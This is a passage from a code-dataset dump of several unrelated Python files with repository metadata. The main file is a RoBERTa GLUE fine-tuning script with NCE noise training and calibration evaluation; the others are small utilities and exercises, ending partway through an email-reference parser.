| 1 | 2022-02-22T04:41:44.000Z | 2022-02-22T18:21:23.000Z | nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | e0598923551c4587e0ea8c4feb001cb9cc736103 | [
"BSD-3-Clause"
]
| 1 | 2021-06-21T09:06:24.000Z | 2021-06-21T09:06:24.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on GLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa)."""
import dataclasses
import logging
import os, math
import sys, copy
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional
import numpy as np
import torch
from transformers import AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, EvalPrediction, GlueDataset
from transformers import BertModel, BertConfig
from transformers import GlueDataTrainingArguments as DataTrainingArguments
from transformers import (
HfArgumentParser,
TrainingArguments,
glue_compute_metrics,
glue_output_modes,
glue_tasks_num_labels,
set_seed,
)
from my_robustness import MyRandomTokenNoise
from my_trainer import MyTrainer
from my_glue_dataset import MyGlueDataset
from my_modeling_roberta import MyRobertaForSequenceClassification, MyRobertaForNCESequenceClassification
from transformers.data.processors.utils import InputFeatures, InputExample
#import matplotlib
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
from my_utils import setLogger
#import checklist_utils
logger = logging.getLogger()
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
@dataclass
class CustomArguments:
do_eval_calibration: bool = field(default=False, metadata={"help": "Whether to print calibration."})
do_eval_scaling_binning_calibration: bool = field(default = False)
do_eval_noise_robustness: bool = field(default = False)
do_eval_checklist: bool = field(default = False)
do_energy_analysis: bool = field(default = False)
train_from_scratch: bool = field(default=False, metadata={"help": "Train from scratch."})
layer_num: int = field(default=2, metadata={"help": "The hidden layer number"})
eval_steps: int = field(default = -1, metadata = {"help": "evaluate steps"})
#my_learning_rate: float = field(default=2e-5) #just use the existing learning_rate
my_random_noise_rate: float = field(default=0)
fast_debug: int = field(default = 0)
nce_noise_file: str = field(default=None)
nce_noise_eval_file: str = field(default=None)
nce_noise_ratio: int = field(default = 1)
nce_lambda: float = field(default = 1)
noiselm_mode: str = field(default='normal')
nce_noise_batch_size: int = field(default = 32, metadata={'help':'nce_noise_batch'})
train_mode: str = field(default='normal') #or nce_noise
nce_mode: str = field(default='normal') #or normal or hidden or labeled or selflabeled
pcal_num_updates: int = field(default=10)
pcal_bin_size: int = field(default=20)
pcalloss_start_epochs: int = field(default=0)
pcal_train: bool = field(default=False)
pcalloss_lambda: float = field(default=1)
pcalloss_type: str = field(default='KL')
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments, CustomArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args, my_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args, my_args = parser.parse_args_into_dataclasses()
all_args = (model_args, data_args, training_args, my_args)
#training_args.learning_rate = my_args.my_learning_rate
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
log_fn = training_args.output_dir + '/log_' + ('train_' if training_args.do_train else '') + ('eval_' if training_args.do_eval else '') + ('evalcalibration_' if my_args.do_eval_calibration else '') + '.txt'
print('logger file will be set to', log_fn)
os.system('mkdir -p ' + training_args.output_dir)
setLogger(logger, log_fn)
my_args.log_fn = log_fn
for kk in range(5): logger.info('==hostname %s', os.uname()[1])
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
try:
num_labels = glue_tasks_num_labels[data_args.task_name]
output_mode = glue_output_modes[data_args.task_name]
except KeyError:
raise ValueError("Task not found: %s" % (data_args.task_name))
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
num_labels=num_labels,
finetuning_task=data_args.task_name,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'normal':
assert('roberta' in model_args.model_name_or_path.lower())
#model = AutoModelForSequenceClassification.from_pretrained(
model = MyRobertaForSequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'nce_noise':
#nce_model = MyRobertaForSequenceClassification(config)
assert('roberta' in model_args.model_name_or_path.lower())
model = MyRobertaForNCESequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_from_scratch:
print('=== training from scratch! reinitilize weights')
embed_bak = copy.deepcopy(model.bert.embeddings)
layer_bak = copy.deepcopy(model.bert.encoder.layer)
model.init_weights()
LL = my_args.layer_num
print('=== applying layer_num', LL)
# Initializing a BERT bert-base-uncased style configuration
new_config = BertConfig(num_hidden_layers=LL)
# Initializing a model from the bert-base-uncased style configuration
new_bert = BertModel(new_config)
print('=== using pretrained embedding')
new_bert.embeddings = embed_bak
"""
for l in range(LL):
print('copying encoder layer', l)
new_bert.encoder.layer[l] = layer_bak[l]
"""
model.bert = new_bert
model.config.num_hidden_layers = LL
nce_noise_train_dataset, nce_noise_eval_dataset = None, None
if my_args.train_mode == 'nce_noise' and training_args.do_train:
# Get datasets
nce_noise_train_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_file, mode = 'train', for_noiselm = False, my_args = my_args))
nce_noise_eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_eval_file, mode = 'dev', for_noiselm = False, my_args = my_args))
# Get datasets
train_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, my_args = my_args)
)
eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, my_args = my_args))
test_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir, my_args = my_args)
if training_args.do_predict
else None
)
def build_compute_metrics_fn(task_name: str) -> Callable[[EvalPrediction], Dict]:
def compute_metrics_fn(p: EvalPrediction):
if output_mode == "classification":
preds = np.argmax(p.predictions, axis=1)
elif output_mode == "regression":
preds = np.squeeze(p.predictions)
return glue_compute_metrics(task_name, preds, p.label_ids)
return compute_metrics_fn
logger.info('constructing datasets (splitting eval_dataset) for calibration...')
dataset_cal_dev1 = copy.deepcopy(eval_dataset)
dataset_cal_dev2 = copy.deepcopy(eval_dataset)
dataset_cal_tr = copy.deepcopy(train_dataset)
cal_num = int(len(eval_dataset) / 2)
dataset_cal_dev1.features = dataset_cal_dev1.features[:cal_num]
dataset_cal_dev2.features = dataset_cal_dev2.features[-cal_num:]
#dataset_cal_tr.features = dataset_cal_tr.features[-cal_num:]
logger.info('setting eval_dataset to dataset_cal_dev2...')
eval_dataset = dataset_cal_dev2
# Initialize our Trainer
trainer = MyTrainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
compute_metrics=build_compute_metrics_fn(data_args.task_name),
tokenizer = tokenizer,
my_args = my_args,
)
print('=== random_noise_rate:', my_args.my_random_noise_rate)
my_noise = MyRandomTokenNoise(tokenizer, my_args.my_random_noise_rate)
input_transform = None
if my_args.my_random_noise_rate > 0:
input_transform = my_noise.add_random_noise
# Training
final_evalres_savefn = None
if training_args.do_train:
#if my_args.train_mode == 'nce_noise':
# trainer.nce_train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform)
#else:
set_seed(training_args.seed) #set seed again before constructing suite, so that it will be the same thing when do_eval
suite = None
#suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
return_d = {}
trainer.train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform, train_mode = my_args.train_mode, nce_noise_dataset = nce_noise_train_dataset, nce_noise_ratio = my_args.nce_noise_ratio, nce_noise_bz = my_args.nce_noise_batch_size, nce_mode = my_args.nce_mode, nce_noise_eval_dataset = nce_noise_eval_dataset, return_d = return_d, checklist_suite = suite, all_args = all_args)
trainer.save_model()
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
if trainer.is_world_master():
tokenizer.save_pretrained(training_args.output_dir)
logger.info('===PRINTING EVAL_RES_LIS===')
for eval_res in return_d['eval_res_lis']:
logger.info(str(eval_res))
final_evalres_savefn = training_args.output_dir + '/eval_res_save/final_eval_res.save'
torch.save(return_d['eval_res_lis'], final_evalres_savefn)
logger.info('eval res saved to %s', final_evalres_savefn)
final_eval_results, final_checklist_eval_results = {}, {}
final_nce_eval_results, final_nce_train_results = {}, {}
# evaluation
eval_results = {}
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
logger.info('===SWITCHING to mnli-mm for test')
eval_dataset = GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
"""
logger.info('seed: %d', training_args.seed)
if training_args.do_eval:
logger.info("*** evaluate ***")
set_seed(training_args.seed) #set seed again before eval
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
#""" #we only look at the matched dev-set for mnli (mm is mismatched)
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
if my_args.train_mode == 'nce_noise':
eval_nce_result = trainer.nce_evaluate(nce_noise_eval_dataset)
final_nce_eval_results.update(eval_nce_result)
train_nce_result = trainer.nce_evaluate(nce_noise_train_dataset, max_step = 500)
final_nce_train_results.update(train_nce_result)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
eval_results.update(eval_result)
#final_eval_results['eval_acc'] = eval_result['eval_acc']
final_eval_results.update(eval_result)
if my_args.do_eval_checklist:
logger.info('*** eval checklist***')
set_seed(training_args.seed) #set seed again before eval
suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
cres = checklist_utils.run_checklist_suite(model, tokenizer, eval_dataset, all_args, given_suite = suite, verbose = True)
final_checklist_eval_results.update(cres)
"""
if data_args.task_name.lower() == 'qqp':
cres = checklist_utils.do_checklist_QQP(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'qnli':
cres = checklist_utils.do_checklist_QNLI(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'sst-2':
cres = checklist_utils.do_checklist_SST2(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
"""
"""
for checklist_trans in ['typo', 'typo^2']:
eval_checklist_dataset = MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, checklist_transform = checklist_trans, my_args = my_args)
eval_result = trainer.evaluate(eval_dataset=eval_checklist_dataset, input_transform = None)
for s in eval_result:
final_checklist_eval_results['checklist_{}_{}'.format(checklist_trans, s)] = eval_result[s]
"""
if my_args.do_eval_noise_robustness:
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
set_seed(training_args.seed) #set seed again before eval
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
eval_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
)
""" #we only look at the matched dev-set for mnli (mm is mismatched)
for noise_rate in [0.1, 0.2]:
logger.info('*** eval_noise_robustness rate: %f ***', noise_rate)
my_noise = MyRandomTokenNoise(tokenizer, noise_rate)
input_transform = my_noise.add_random_noise
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
if 'eval_mnli/acc' in eval_result: eval_result['eval_acc'] = eval_result['eval_mnli/acc']
final_eval_results['randomnoise{}_eval_acc'.format(noise_rate)] = eval_result['eval_acc']
import calibration as cal
from my_calibration import TScalCalibrator
def do_cal(trainer, eval_d, do_postcal = False, do_plattbin = True, do_tscal = True, tr_d = None, ss = ''):
prediction_output = trainer.predict(test_dataset=eval_d)
probs_eval, labels_eval = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
if do_postcal == False:
ece = cal.get_ece(probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
res = {}
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = prediction_output.predictions, label_ids = prediction_output.label_ids))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'acc': acc, ss + 'ece': ece})
logger.info('cal_res: %s', str(res))
return res
prediction_output = trainer.predict(test_dataset=tr_d)
probs_tr, labels_tr = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
res = {}
if do_plattbin == True:
calibrator = cal.PlattBinnerMarginalCalibrator(len(probs_tr), num_bins=20)
calibrator.train_calibration(probs_tr.numpy(), labels_tr.numpy())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.numpy()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'plattbin_acc': acc, ss + 'plattbin_ece': ece})
if do_tscal == True:
calibrator = TScalCalibrator(num_bins=20)
calibrator.train_calibration(probs_tr.cpu(), labels_tr.cpu())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.cpu()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'tscal_acc': acc, ss + 'tscal_ece': ece})
logger.info('cal_res: %s', str(res))
return res
if my_args.do_eval_calibration:
logger.info("*** do calbiration ***")
#if data_args.task_name.lower() == 'cola':
#it's cola, let's do evaluate for mcc
#res = trainer.evaluate(eval_dataset = dataset_cal_dev2)
set_seed(training_args.seed) #set seed again before eval
drawcal_res = trainer.eval_calibration(dataset_cal_dev2, verbose = True, fig_fn = training_args.output_dir + '/{}_calibration.pdf'.format(data_args.task_name))
save_fn = training_args.output_dir + '/drawcal.save'
logger.info('saving drawcal_res to %s', save_fn)
torch.save(drawcal_res, save_fn)
cal_res = do_cal(trainer, dataset_cal_dev2, do_postcal = False, ss = 'cal_ori_')
final_eval_results.update(cal_res)
if my_args.do_eval_scaling_binning_calibration:
logger.info('*** do scaling_binning calibration ***')
set_seed(training_args.seed)
cal_res = {}
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_dev1, ss = 'cal_dev_'))
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_tr, ss = 'cal_train_'))
logger.info('===scaling_binning_calibration %s', str(cal_res))
final_eval_results.update(cal_res)
if training_args.do_predict:
logging.info("*** Test ***")
test_datasets = [test_dataset]
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
test_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir)
)
for test_dataset in test_datasets:
predictions = trainer.predict(test_dataset=test_dataset).predictions
if output_mode == "classification":
predictions = np.argmax(predictions, axis=1)
output_test_file = os.path.join(
training_args.output_dir, f"test_results_{test_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_test_file, "w") as writer:
logger.info("***** Test results {} *****".format(test_dataset.args.task_name))
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if output_mode == "regression":
writer.write("%d\t%3.3f\n" % (index, item))
else:
item = test_dataset.get_labels()[item]
writer.write("%d\t%s\n" % (index, item))
if my_args.do_energy_analysis:
logger.info('*** do_energy_analysis ***')
eval_dataloader = trainer.get_eval_dataloader(dataset_cal_dev2)
logger.info('loading baseline model...')
if data_args.task_name.lower() == 'sst-2':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/SST-2/LR2e-5BA32MAXSTEP5233WARMSTEP314/')
if data_args.task_name.lower() == 'qnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/QNLI/LR2e-5BA32MAXSTEP8278WARMSTEP496')
if data_args.task_name.lower() == 'mrpc':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MRPC/LR1e-5BA16MAXSTEP2296WARMSTEP137')
if data_args.task_name.lower() == 'mnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MNLI/LR2e-5BA32MAXSTEP30968WARMSTEP1858/')
base_model = base_model.cuda()
lis_energy, lis_logits, lis_logits_base = [], [], []
for step, inputs in enumerate(eval_dataloader):
has_labels = any(inputs.get(k) is not None for k in ["labels", "lm_labels", "masked_lm_labels"])
for k, v in inputs.items():
inputs[k] = v.cuda()
return_d = {}
model.eval(); base_model.eval();
with torch.no_grad():
outputs = base_model(**inputs)
lis_logits_base.append(outputs[1])
inputs['special_mode'] = 'nce_noise'
inputs['nce_mode'] = my_args.nce_mode
inputs['return_d'] = return_d
inputs['nce_feed_type'] = 'data'
inputs['nce_noise_ratio'] = my_args.nce_noise_ratio
outputs = model(**inputs)
lis_energy.append(return_d['nce_logits'])
lis_logits.append(outputs[1])
all_energy = torch.cat(lis_energy, dim = 0).view(-1)
all_probs = torch.softmax(torch.cat(lis_logits, dim = 0), dim = -1)
all_probs_base = torch.softmax(torch.cat(lis_logits_base, dim = 0), dim = -1)
sorted_idx = all_energy.sort(descending = False)[1]
save_fn = training_args.output_dir + '/dev_energy.save'
logger.info('saving all_energy to %s', save_fn)
torch.save({'all_energy': all_energy.cpu(), 'all_probs': all_probs.cpu(), 'all_probs_base': all_probs_base.cpu()}, save_fn)
print('low energy:')
for idx in sorted_idx[:10].tolist():
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:100]))
print('high energy:')
for idx in sorted_idx[-10:].tolist():
if torch.argmax(all_probs_base[idx]).item() != dataset_cal_dev2[idx].label:
print(idx, '\tenergy:', all_energy[idx].item(), 'prediction prob:', all_probs[idx].tolist(), 'prediction prob baseline:', all_probs_base[idx].tolist(), 'label:', dataset_cal_dev2[idx].label, 'text:', tokenizer.decode(dataset_cal_dev2[idx].input_ids[:70]))
logger.info('output_dir: %s', training_args.output_dir)
if my_args.train_mode == 'nce_noise':
logger.info('===FINAL NCE_EVAL RESULT===')
report_str = '[EVAL_DATA] '
for idx in final_nce_eval_results: report_str += idx + ':' + str(final_nce_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
report_str = '[TRAIN_DATA] '
for idx in final_nce_train_results: report_str += idx + ':' + str(final_nce_train_results[idx])[:5] + ', '
logger.info('%s', report_str)
"""
logger.info('===FINAL CHECKLIST_EVAL RESULTS===')
report_str, ll = '', []
for idx in final_checklist_eval_results:
if idx != 'AVG':
report_str += idx + ':' + str(final_checklist_eval_results[idx] * 100)[:5] + '%, '
#ll.append(final_checklist_eval_results[idx])
logger.info('%s AVG: %s', report_str, str(final_checklist_eval_results['AVG'] * 100)[:5] + '%')
"""
logger.info('===FINAL EVAL RESULTS===')
report_str = ''
for idx in final_eval_results: report_str += idx + ':' + str(final_eval_results[idx])[:5] + ', '
logger.info('%s', report_str)
if final_evalres_savefn is not None:
logger.info(final_evalres_savefn)
return eval_results
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| 50.279732 | 467 | 0.667922 | 2,286 | 0.076157 | 0 | 0 | 2,308 | 0.07689 | 0 | 0 | 8,802 | 0.293234 |
9068b9974dcf2fb879760cc992a13d9cece6f426 | 43 | py | Python | tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 5f7610e10b11e05591d6e2dc030c3ca5dc2a90b4 | [
"BSL-1.0"
]
| 15 | 2015-01-18T18:02:16.000Z | 2021-08-02T09:20:35.000Z | tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 5f7610e10b11e05591d6e2dc030c3ca5dc2a90b4 | [
"BSL-1.0"
]
| null | null | null | tools/python/myriad/__init__.py | TU-Berlin-DIMA/myriad-toolkit | 5f7610e10b11e05591d6e2dc030c3ca5dc2a90b4 | [
"BSL-1.0"
]
| 5 | 2015-08-10T21:50:39.000Z | 2018-03-14T15:31:28.000Z | __all__ = [ "assistant", "event", "error" ] | 43 | 43 | 0.604651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.581395 |
9068dd91546f900a5c60936212742aac5fb95fd0 | 577 | py | Python | Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 79db667028aea7dfecb3dbbd834c752180c50f44 | [
"Unlicense"
]
| null | null | null | Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 79db667028aea7dfecb3dbbd834c752180c50f44 | [
"Unlicense"
]
| null | null | null | Python/Advanced/Tuples And Sets/Lab/SoftUni Party.py | EduardV777/Softuni-Python-Exercises | 79db667028aea7dfecb3dbbd834c752180c50f44 | [
"Unlicense"
]
| null | null | null | guests=int(input())
reservations=set([])
while guests!=0:
reservationCode=input()
reservations.add(reservationCode)
guests-=1
while True:
r=input()
if r!="END":
reservations.discard(r)
else:
print(len(reservations))
VIPS=[]; Regulars=[]
for e in reservations:
if e[0].isnumeric():
VIPS.append(e)
else:
Regulars.append(e)
VIPS.sort(); Regulars.sort()
for k in VIPS:
print(k)
for k in Regulars:
print(k)
break | 22.192308 | 37 | 0.514731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 | 0.008666 |
9068dfa377a4e3878aa69220570645e9c12f27ec | 404 | py | Python | locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
]
| 4 | 2020-08-07T08:19:19.000Z | 2020-12-04T09:51:11.000Z | locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
]
| 19 | 2020-08-06T00:24:30.000Z | 2022-03-30T19:22:24.000Z | locale/pot/api/plotting/_autosummary/pyvista-Plotter-remove_all_lights-1.py | tkoyama010/pyvista-doc-translations | 23bb813387b7f8bfe17e86c2244d5dd2243990db | [
"MIT"
]
| 1 | 2021-03-09T07:50:40.000Z | 2021-03-09T07:50:40.000Z | # Create a plotter and remove all lights after initialization.
# Note how the mesh rendered is completely flat
#
import pyvista as pv
plotter = pv.Plotter()
plotter.remove_all_lights()
plotter.renderer.lights
# Expected:
## []
_ = plotter.add_mesh(pv.Sphere(), show_edges=True)
plotter.show()
#
# Note how this differs from a plot with default lighting
#
pv.Sphere().plot(show_edges=True, lighting=True)
| 25.25 | 62 | 0.762376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.457921 |
906c0d695c5d23512c396e22821fa9b115229101 | 880 | py | Python | einsum.py | odiak/einsum | c7c71f8daefcf33b4743cc8dca588577d03bdde6 | [
"MIT"
]
| null | null | null | einsum.py | odiak/einsum | c7c71f8daefcf33b4743cc8dca588577d03bdde6 | [
"MIT"
]
| null | null | null | einsum.py | odiak/einsum | c7c71f8daefcf33b4743cc8dca588577d03bdde6 | [
"MIT"
]
| null | null | null | from typing import Dict, Tuple
import numpy as np
def einsum(expr: str, *args: Tuple[np.ndarray, ...], **kwargs) -> np.ndarray:
(a, b) = map(str.strip, expr.split("->"))
a_ = list(
map(lambda s: list(map(str.strip, s.split(","))), map(str.strip, a.split(";")))
)
b_ = list(map(str.strip, b.split(",")))
chars = "abcdefghijklmnopqrstuvwxyz"
char_map: Dict[str, str] = {}
i = 0
for cs in a_:
for c in cs:
if c not in char_map:
char_map[c] = chars[i]
i += 1
for c in b_:
if c not in char_map:
char_map[c] = chars[i]
i += 1
expr_ = "->".join(
[
",".join(map(lambda ss: "".join(map(lambda s: char_map[s], ss)), a_)),
"".join(map(lambda s: char_map[s], b_)),
]
)
return np.einsum(expr_, *args, **kwargs)
| 29.333333 | 87 | 0.494318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.059091 |
906c820368e4e2bf91a72f86c8e3c46b23314109 | 4,201 | py | Python | aarhus/get_roots.py | mikedelong/aarhus | 0c0e94fadd65be8428fe3bd2c92928e1b23fc2a1 | [
"Apache-2.0"
]
| null | null | null | aarhus/get_roots.py | mikedelong/aarhus | 0c0e94fadd65be8428fe3bd2c92928e1b23fc2a1 | [
"Apache-2.0"
]
| 7 | 2017-01-13T19:04:57.000Z | 2017-01-23T14:10:53.000Z | aarhus/get_roots.py | mikedelong/aarhus | 0c0e94fadd65be8428fe3bd2c92928e1b23fc2a1 | [
"Apache-2.0"
]
| null | null | null | import json
import logging
import os
import pickle
import sys
import time
import pyzmail
# http://mypy.pythonblogs.com/12_mypy/archive/1253_workaround_for_python_bug_ascii_codec_cant_encode_character_uxa0_in_position_111_ordinal_not_in_range128.html
reload(sys)
sys.setdefaultencoding("utf8")
logging.basicConfig(format='%(asctime)s : %(levelname)s :: %(message)s', level=logging.DEBUG)
def process_folder(arg_folder, arg_reference, arg_in_or_out, arg_document_count_limit):
result = dict()
document_count = 0
no_references_count = 0
references_count = 0
message_id_count = 0
for root, subdirectories, files in os.walk(arg_folder):
for current in files:
# first get the references node
if document_count < arg_document_count_limit:
current_full_file_name = os.path.join(root, current)
if document_count % 1000 == 0 and document_count > 0:
logging.debug("%d %s", document_count, current_full_file_name)
references, message = get_references(current_full_file_name)
if 'references' in references.keys():
# if references.has_key('references'):
